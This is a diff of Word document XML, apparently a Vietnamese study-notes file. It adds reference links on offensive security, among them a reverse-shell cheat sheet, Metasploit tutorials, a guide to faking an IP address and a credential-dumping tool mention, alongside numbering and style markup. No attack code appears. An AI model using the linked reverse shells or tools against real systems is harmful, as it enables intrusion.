+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lỗi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ,exploit )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=M1O7xH2uJtM</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=qK0pxxhf0Ik</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>mimikart</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tham</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>khảo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://stackoverflow.com/questions/10182751/server-client-send-receive-simple-text</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=eFR93buUAFk</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://maytinhkhoe.com/thu-thuat/huong-dan-fake-ip-don-gian-bang-phan-mem-proxifier.html/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://kechocgian.blogspot.com/2013/04/metasploit-framework.html</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.offensive-security.com/metasploit-unleashed/donate/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=qK0pxxhf0Ik</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> ( demo)</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -6799,6 +10756,184 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="16B674F1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="12720E14"/>
+    <w:lvl w:ilvl="0" w:tplc="F0B27634">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1C8A1C8E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="CDA60910"/>
+    <w:lvl w:ilvl="0" w:tplc="D5DE52B8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2473139F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="22D835B8"/>
@@ -6887,7 +11022,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4E584C0C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DA0CBC6C"/>
@@ -6976,7 +11111,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="62E65C4C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="826A8CB6"/>
@@ -7066,15 +11201,21 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
@@ -7479,6 +11620,29 @@
       <w:sz w:val="26"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="003C137B"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:ind w:firstLine="720"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -7589,6 +11753,32 @@
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="003C137B"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NoSpacing">
+    <w:name w:val="No Spacing"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="003C137B"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+      <w:sz w:val="26"/>
     </w:rPr>
   </w:style>
 </w:styles>
